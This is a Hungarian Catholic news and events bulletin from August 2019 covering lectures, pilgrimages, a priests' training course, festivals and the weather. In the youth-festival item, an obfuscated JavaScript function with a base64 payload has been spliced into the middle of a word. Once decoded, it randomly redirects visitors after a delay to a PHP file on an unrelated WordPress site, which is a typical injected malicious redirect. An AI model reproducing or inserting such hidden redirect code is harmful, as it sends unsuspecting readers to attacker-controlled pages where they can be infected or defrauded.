2019. augusztus 26. – Hírek és programajánló

H Í R E K   D É L B E N

Lélekóra Kovásznán
Szeptember 1-én, vasárnap folytatódik az előadás sorozat a kovásznai római katolikus templomban. A délelőtt 11 órai szentmise után hallgathatják meg Bedő Imre előadását „Fontos-e férfinak lenni?” címmel.

Előadás Márton Áronról
Nagy Zoltán székelyudvarhelyi tanár Isten szolgája Márton Áron püspökké szentelésének 80. évében Erdély szentéletű püspökéről tart képekkel, eredeti hangfelvételekkel, filmrészletekkel gazdagított előadást. Egyben bemutatja a kolozsvári Verbum Kiadónál megjelent A „Hegy” című, háromlemezes DVD-összeállítást a püspök életéről és az „Imádkozzunk Áron püspökkel!” című imafüzetet. Az előadás szeptember 1-én, vasárnap délután 3 órától a kaplonyi ferences templomban lesz hallható, szeptember 2-án este 8 órától pedig Nagybányán, a Philia rendezvényteremben.

Szentségimádási iskola
„Tanuljatok tőlem” mottóval 12 alkalmas találkozást szerveznek az Úrral való együttlétben Nagybányán a Szentháromság-templomban. Az első alkalom augusztus 29-én, csütörtökön lesz este 8 órától. Aki szeretne Jézussal négyszemközt találkozni, Őt jobban megismerni, gyógyulni sebzettségéből, iratkozzon be ebbe az „iskolába”.

Papi továbbképző
A gyulafehérvári főegyházmegyében az előző évekhez hasonlóan, idén is megszervezik a Megtestesült Bölcsességről nevezett Szemináriumban a papi továbbképzőt. A továbbképző, kiváló alkalom arra, hogy nemcsak szellemiekben, de lelkiekben, és paptestvéri kapcsolatainkban is felfrissülést, találkozási lehetőséget nyújtson.
Az idei papi továbbképző szeptember 2-6 között lesz, mely három tematikát kínál az érdeklődőknek: szentirástudományi, egyháztörténelmi és pasztorálteológiai megfontolásokat bontakoztat ki.
Jelentkezni lehet augusztus 30-ig Obermájer Ervin atyánál a 0757-096044-es telefonszámon vagy e-mailben a ervinobermajer@gmail.com címen.

Gyergyói méhész és méznap
Szeptember 14-én, szombaton harmadik alkalommal rendezik meg a gyergyói családi méhész és méznapot a gyulafehérvári Caritas Varga Katalin utcai székhelyén. A program délelőtt 10 órakor kezdődik, amely keretében lesz mézmegáldás és mézlovag avató, az érdeklődők előadásokat hallhatnak a méz jótékony hatásairól és meg is vásárolhatják a különböző fajtákat. A gyerekeket mézeskalács kóstolás, arcfestés és bábszínház várja.

Nyitott templomok napja
Az Ars Sacra Fesztivál keretén belül, az Európai Örökségnapokkal együttműködve minden év szeptemberének harmadik szombatján meghívják a történelmi egyházak képviselőit, hogy nyissák meg templomaik kapuját, és színes kulturális programokkal várják az érdeklődőket. Mutassák be a templom építészeti, művészeti értékeit, előadásokat, beszélgetéseket, gyerekprogramokat, filmvetítéseket, kiállításokat szervezzenek a Nyitott Templomok Napján, mely idén szeptember 14-én lesz. Adja Isten, hogy minél többen csatlakozzanak a kezdeményezéshez, hogy a hívek bepillanthassanak a megszentelt falak mögé.

Medjugorjei zarándoklat
Zarándokvonat indul Medjugorjéba szeptember 15-20. között Budapestről a Keleti pályaudvarról. Erdélyből 14-én indul az autóbusz Budapestre a vonathoz és 21-én érkezik vissza.
A zarándokvonat lelkivezetői: Székely János szombathelyi megyéspüspök, Michels Antal, Fuchs Tibor és Daniel Ernő atyák. Karnagy: Pálmai Árpád lesz.
Érdeklődni és jelentkezni lehet az info@missziotours.ro email címen vagy a 0365 405 343-as telefonszámon.

Ez az a nap roadshow
Nick Vujicic októberben Magyarországra és Erdélybe látogat az Ez az a nap! és a Nem adom fel Alapítvány szervezésében. A végtagok nélkül született igehirdető, motivációs tréner október 23.-án Kolozsváron, október 24.-én Sepsiszentgyörgyön, majd október 25.-én Budapesten tart két előadást a reményről, szeretetről és saját megtapasztalásairól délelőtt diákoknak, este pedig a nagyközönség számára. A magyarországi előadásra már kaphatóak jegyek a www.ezazanap.hu oldalon.

Időjárás: Augusztus utolsó hetében sem tágít a meleg, nyári idő, a legtöbb helyen 30 fok feletti maximumokkal. Ugyan sok napsütésre készülhetünk, de a megnövekvő gomolyfelhőkből az ország nagy részén kialakulhat zápor, zivatar. Mögöttük átmeneti lesz a felfrissülés, a legtöbb helyen, főként a melegebb nyugati tájakon fülledtté, párássá válik a levegő. 27-34 fok várható.

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a dési ferences templomban tartanak örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, fejezzük ki ily módon is Krisztushoz való hűségünket és ragaszkodásunkat.

Nőszövetségek őszi találkozója Csíksomlyón
Az Erdélyi Római Katolikus Nőszövetségek Egyesülete elnökei és lelkivezetői  lelkigyakorlatos találkozóját augusztus 26-28. között Csíksomlyón tartják. Az ERNKE idén ünnepli megalakulásának 20. évét. Az őszi találkozó záró szentmiséjét augusztus 28-án, déli 12 órától Tamás József segédpüspök mutatja be a csíksomlyói kegytemplomban.

25.Úz- völgyi megemlékezés
Az előző évekhez hasonlóan idén is megtartják a megemlékezést az Úz-völgyében a világháborús hősök emlékére. A megemlékezés délután 3 órakor kulturális programmal kezdődik, majd 4 órától ünnepi szentmise lesz, amelynek főcelebránsa Tamás József segédpüspök, meghívott szónoka pedig Böjte Csaba atya. Imádkozzunk együtt!

Szent István Családi Nap Kovásznán
Augusztus 31.-én, szombaton 10 órától Kovásznán a római katolikus templom kertjében családi napot szerveznek, melyre szeretettel várják a családokat.

Búcsú és jubileum Krasznacégényben
70 éves jubileumát, valamint a templom búcsúját ünneplik Krasznacégényben szeptember 1-jén, délután 4 órai kezdéssel. Nagy szeretettel hívják és várják a helyi és környékbeli híveket, különösen a csíkmenaságiakat, mivel a lakosok nagy része onnan származik.

Lelkinap a Gerhardinumban
Szeptember 2-án, hétfőn 9-17 óra között a temesvár-erzsébetvárosi szalvatoriánus rendházban lelkinapot tartanak a Gerhardinum Római Katolikus Líceum tanárainak és nevelőinek. A programot Szilvágyi Zsolt pasztorációért felelős püspöki helynök vezeti.

Kántorvizsga Csíksomlyón
Az Egyházzenei Bizottság ebben az évben is kántorvizsgát szervez azok részére, akik a szükséges ismeretek elsajátítása után kántori oklevelet szeretnének szerezni. A kántorvizsga Csíksomlyón, a Ferences Kolostorban lesz szeptember 2-án.
Jelentkezni a segédpüspöki hivatalban lehet a 0740-898667-es vagy a 0266-372223-as telefonszámok egyikén, illetve a jozsef.tamas@romkat.ro e-mail címen. A vizsga díja 100 lej. Kántorvizsgára csak XII. osztályt végzett, abszolválási diplomával és plébánosi ajánlással rendelkező személyeket fogadnak el.

Követlek téged, bárhová mész
A Gyulafehérvári Családpasztorációs központ és a Pasztorációs Iroda szeptember 7-én, szombaton gyalogos zarándoklatot szervez családok számára, a hivatások éve keretén belül.
A zarándokok délelőtt 10 órakor indulnak Fitódból és gyalogosan elzarándokolnak a csíksomlyói kegytemplomig, közben imával és énekekkel kérik Isten segítségét és áldását családjukra, hálát adnak a házas hivatás kegyelmeiért.
A zarándoklat csúcspontja a kegytemplomban a Pál József Csaba temesvári püspök által celebrált szentmise lesz mely 11:30-kor kezdődik, ezt követően pedig a résztvevők lelki programon töltődhetnek fel. Jelentkezni szeptember 3-ig lehet a csalad.ro honlapon található elektronikus űrlap kitöltésével.

Ifjúsági keresztény fesztivál
„Ő az út!” mottóval rendeznek keresztény ifjúsági fesztivált Maroszentgyörgyön, a Maros-parton szeptember 14-én, szombaton. A fesztivál főképp a fiatalokat célozza, mert szeretnék, ha minél többen megtapasztalnák, hogy Istennel élni feltöltő, örömteli és kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andos. A szervezők Isten örök igazságait szeretnék átadni a sátorprogramok, koncertek, tanúságtételek, versenyek, táncok, kihívások, közös agapé és jó beszélgetések által. A program délután 5 órakor kezdődik, fellépnek a Shalom Budapest zenekar, Eddy és Csiszér László. A programról részletesebben a www.oazut.ro oldalon olvashatnak.

Lelkipásztori munkatárs képzés
A Gyulafehérvári Főegyházmegye Pasztorális Bizottsága újra meghirdeti a főegyházmegyei lelkipásztori munkatársképzést idén októbertől, Sepsiszentgyörgyön. A képzés időtartama 3 év és évi négy, hétvégi, tömbösített képzési alkalomból áll. Egy-egy képzési tömb a lelki program mellett elméleti előadások, műhelymunkák, csoportmegbeszélések keretében négy témát foglal magába. Az érdeklődők szeptember 12-ig jelentkezhetnek a gyf.pasztoralis.iroda@gmail.com email címen. A jelentkezéshez plébánosi ajánlás szükséges. A képzéssel kapcsolatosan érdeklődni lehet Molnár Izabellánál a 0753-869706-os telefonszámon.

Időjárás: Augusztus utolsó hetében sem tágít a meleg, nyári idő, a legtöbb helyen 30 fok feletti maximumokra kell számítani. Ugyan sok napsütésre készülhetünk, de a megnövekvő gomolyfelhőkből az ország nagy részén kialakulhat zápor, zivatar. Mögöttük átmeneti lesz a felfrissülés, a legtöbb helyen, főként a melegebb nyugati tájakon fülledtté, párássá válik a levegő. 27-34 fok várható.

MRE - Hírszolgálat, 2019. augusztus 26.

About the author

Majoros Gabriella